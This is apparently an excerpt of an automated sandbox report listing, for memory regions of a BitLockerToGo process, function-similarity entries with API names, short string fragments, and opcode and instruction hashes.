                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0e511da1d023be4f9311503bd1b7d668afce91a3cfb28f0ec7d3cd720e542957
                                                                                                                                                                  • Instruction ID: 8185247af7f8c2b1aeb266faaa80113261a9080d31535d803eb1690772a1ed1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e511da1d023be4f9311503bd1b7d668afce91a3cfb28f0ec7d3cd720e542957
                                                                                                                                                                  • Instruction Fuzzy Hash: E5713B315483818FE7158E28E8513677BE9EF82208F38897DDACACB385E375D946C791
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b9fcb81810c4c8307f44bab193f9b6eb207a91ce2461ed9b8f2f818275158c9c
                                                                                                                                                                  • Instruction ID: 106c4de26f62d5a742975c0577a4cfa4e23a89c3863dcc17e6909601214ed997
                                                                                                                                                                  • Opcode Fuzzy Hash: b9fcb81810c4c8307f44bab193f9b6eb207a91ce2461ed9b8f2f818275158c9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B514A706007418FDB3A9F29C880B27B7F6AF89314F248A6DD0AB87750E774E945CB95
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8c7abce5c5f7ab1fe8450decd13573bc729a29e5b9153926aac70728a59fbdfc
                                                                                                                                                                  • Instruction ID: c3ff5f565ad68220955c9ff24ee4f3656c324c66749477b4c6c868ef16639777
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7abce5c5f7ab1fe8450decd13573bc729a29e5b9153926aac70728a59fbdfc
                                                                                                                                                                  • Instruction Fuzzy Hash: E7510633B4A9914BF328883D5CA13AAEA834BD6234F2D976AD4F54F3E1D5659C02C351
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 39148704f5411def39d41399c0b50f349c510afd46f1834384ad0b9fc0f3ab1b
                                                                                                                                                                  • Instruction ID: 47530da2ddaf6a0734ca783ae1920cf508e55e57d3f9068cc1390144744a3510
                                                                                                                                                                  • Opcode Fuzzy Hash: 39148704f5411def39d41399c0b50f349c510afd46f1834384ad0b9fc0f3ab1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F51C577B14A110BD75DC929C87173EB5935BC8220F5CC63EE96B8B3DAEB3099158281
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 824e5ff18a77033ae72fac51b5cbe15ae232342a480dbc760ad134b1510f14fe
                                                                                                                                                                  • Instruction ID: efe46e9e75763f0cba6ebaf482196de392631fa08c2aa2c312ab8d463448cfab
                                                                                                                                                                  • Opcode Fuzzy Hash: 824e5ff18a77033ae72fac51b5cbe15ae232342a480dbc760ad134b1510f14fe
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C51E333A5A5D046E714493D5C813B9EA171BE7234B3E8366A8F18F3E1C666DC12C391
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: acece101d991fd88545e1eacf96e568cccd0dd0d67afc87e52e81b8ca9d8e753
                                                                                                                                                                  • Instruction ID: 607415693c8478b91c38fcf58539404ebb78f5f9ec85f4b9e72bd7296361b097
                                                                                                                                                                  • Opcode Fuzzy Hash: acece101d991fd88545e1eacf96e568cccd0dd0d67afc87e52e81b8ca9d8e753
                                                                                                                                                                  • Instruction Fuzzy Hash: B361AB7060C341BBE7659E15E880B2AFBE2EB84314F58899CF5D9877A1D331EC54CB52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0c74a5fcb78ba7649df40a37d0d90475295fc2b447c5cb1f91e2738a5b779dff
                                                                                                                                                                  • Instruction ID: 0fed61a014119ff398050d21b89a3a03a82f4450d2c851ebb4a657f90a182dae
                                                                                                                                                                  • Instruction Fuzzy Hash: F10184F1B4030147E7A0DF54D4C072BB2A9EFC4718F19443CDA0A97B91DB75EA15DA91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8a3b4a7cc5d26bea5e0484f30bce549a2fe35a875b1bfd3b42ec138a3273e8a3
                                                                                                                                                                  • Instruction ID: c0141a9e59c61e066c4a1f3e05571b14ba6d0921d6d1dbd7c07d648b3562aaf3
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a3b4a7cc5d26bea5e0484f30bce549a2fe35a875b1bfd3b42ec138a3273e8a3
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF0E8F0524200AEE610BA3CCE1AB6B7AACAB40214F404A48FC6597695E2705C1487E2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f8bf7594880540893e588c0e7e71e778f46c810e84ffe6c34b5c7349b40fdcb5
                                                                                                                                                                  • Instruction ID: 801f4cfc8fe2b32f3a4226c882eb37a2ac534de883692f7c9abe96bfda29232d
                                                                                                                                                                  • Opcode Fuzzy Hash: f8bf7594880540893e588c0e7e71e778f46c810e84ffe6c34b5c7349b40fdcb5
                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0E5B2A046501FDF3289949CC0F3BBB9CCBCB228F1A1865E88757202E2619C40C3E6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8c60195500c2cbe964d8ff92ffcdc615068a7c6dd94760675cb862beec79c2ce
                                                                                                                                                                  • Instruction ID: 4e058ef68ad2f9834f934cb506bb30886335b8dfc4df53278790a43dfbdcdda7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c60195500c2cbe964d8ff92ffcdc615068a7c6dd94760675cb862beec79c2ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0122480C2D1CDE7178F27D0D0771BFA1AB13385B1851CAD8DA5B3A3C325D84AC765
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                  • Instruction ID: b44a3cead7cbc87f6696e0ef917a42a5847532d880797ebb12fa68d241e52f00
                                                                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                  • Instruction Fuzzy Hash: ACD0A7216083715BAF789E19B400977F7F0EAC7A12F49955FF982E3248E730DC81C2A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ab39ec4045443febfa1909a9f66a6e6478b5b343ae8fc0d9f4f731ed3d0c77df
                                                                                                                                                                  • Instruction ID: 993b8a16dc59a34cc4ce071cb82f539b541aafd7aeaec185c22e71338d8867a3
                                                                                                                                                                  • Opcode Fuzzy Hash: ab39ec4045443febfa1909a9f66a6e6478b5b343ae8fc0d9f4f731ed3d0c77df
                                                                                                                                                                  • Instruction Fuzzy Hash: 74D05EB5C4C240EBD2949E10A0A10B673B8E666216F0028E5E08653701D239DCAADB26
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3ecf3634c20fe775d5a5f5cfacaed08ec8e01f3190085d3e9bf92c99c6cd0f27
                                                                                                                                                                  • Instruction ID: 4f3b48220d77f1bd55e764897dd7ab8029a5fc04c793c00e30cb5b06f1e799fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ecf3634c20fe775d5a5f5cfacaed08ec8e01f3190085d3e9bf92c99c6cd0f27
                                                                                                                                                                  • Instruction Fuzzy Hash: B3D05E3040C31685C7148F04D062677B3B4EF83685F042809E0C21BA28F378C984D38A
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                  • String ID: !$#$'$1$3$5$7$9$;$=$?$@$K$M$T$X$[$a$a$b$b$c$c$e$g$h$i$k$m$n$o$r$t$y$}$}
                                                                                                                                                                  • API String ID: 2525500382-110656264
                                                                                                                                                                  • Opcode ID: 9f4f747b9bed2833e2138b0fbf7d125e87ad64622abd9a0cdc60b35083dea185
                                                                                                                                                                  • Instruction ID: 24e045ebd21fe7e6229d9d6cdeb17a6a7c6baf544e90d145fa4ef2a0d8031a16
                                                                                                                                                                  • Opcode Fuzzy Hash: 9f4f747b9bed2833e2138b0fbf7d125e87ad64622abd9a0cdc60b35083dea185
                                                                                                                                                                  • Instruction Fuzzy Hash: B5818F7050CBC1CAD332C62898987DBBFE16BE6319F480A9DD4D94A3D2C3BA4549C763
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                  • String ID: !$#$%$'$*$+$9$=$?
                                                                                                                                                                  • API String ID: 1927566239-1641786196
                                                                                                                                                                  • Opcode ID: f1820f9d7f7bbd8f74cb6fee9e1ad12efceb538f00a1913f2c14719095c60bf0
                                                                                                                                                                  • Instruction ID: adaee8f6787bc227ae3be91b1e25a05db32f9ee3aa9111393aeefc4bcd0f2ebb
                                                                                                                                                                  • Opcode Fuzzy Hash: f1820f9d7f7bbd8f74cb6fee9e1ad12efceb538f00a1913f2c14719095c60bf0
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31FF7100C3C58ED336DB2890997DBBBE0AB96304F044D9DE6E887382C7759609CBA3
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                  • String ID: `$j$k$l$l$q$}
                                                                                                                                                                  • API String ID: 2610073882-1688293196
                                                                                                                                                                  • Opcode ID: 0cc297f45a4010299df5b25b46e71c3130874fa31922f32f071c35d34307850f
                                                                                                                                                                  • Instruction ID: eb95c3b5c36452ff35d06d1a6ed358bc7dcbedaaed1a352d91bae2958d2be299
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc297f45a4010299df5b25b46e71c3130874fa31922f32f071c35d34307850f
                                                                                                                                                                  • Instruction Fuzzy Hash: C751F66010D7C1CEE331DB788458B8EBFE0AB96224F044A9DE5E95B3D2D3755445CB63
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                  • String ID: "$4$m$u$~
                                                                                                                                                                  • API String ID: 2610073882-2914945269
                                                                                                                                                                  • Opcode ID: cf1a23fbd6133853c4b1c3ef88b8a37c778b55b624e907657c966e9ea95358b0
                                                                                                                                                                  • Instruction ID: 18cc3d6b7213e6196e307f0892e38d36eac78e6258ac9649fa4700e226ea3357
                                                                                                                                                                  • Opcode Fuzzy Hash: cf1a23fbd6133853c4b1c3ef88b8a37c778b55b624e907657c966e9ea95358b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 0041B37054C7C2CED331DA288448B9EBFE0ABA6224F048E6DE5E9472D2D7755445DB23
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID: String
• String ID: /$8$?
• API String ID: 2568140703-3340046098
• Opcode ID: 9658e37aa3b603d222914f39b439ec998b58d3df81c9c56d0a746c23f0eff88c
• Instruction ID: fce7e79c933e0a7053a09b0875895c3206e061be47f894307cb72c81ff427a9e
• Opcode Fuzzy Hash: 9658e37aa3b603d222914f39b439ec998b58d3df81c9c56d0a746c23f0eff88c
• Instruction Fuzzy Hash: 32712B716083818BC3359F28D4907AEBBE2BFC9314F598A2DD5D98B3D1CB759806CB52
Strings
Memory Dump Source
• Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: :
• API String ID: 0-336475711
• Opcode ID: 5685a2589d36cec9d8e6226ce7a62f863a457931d9f86a5912853f19da67ac39
• Instruction ID: 9af98b13a12d1ca4b0350496bc2d9eef2df5def9825f548bd7667ed66bdc28b2
• Opcode Fuzzy Hash: 5685a2589d36cec9d8e6226ce7a62f863a457931d9f86a5912853f19da67ac39
• Instruction Fuzzy Hash: 1C3137B0598340EBE3208F11D859B4BBBF4FB8A399F404D0CF5C85A391D7B59859CB96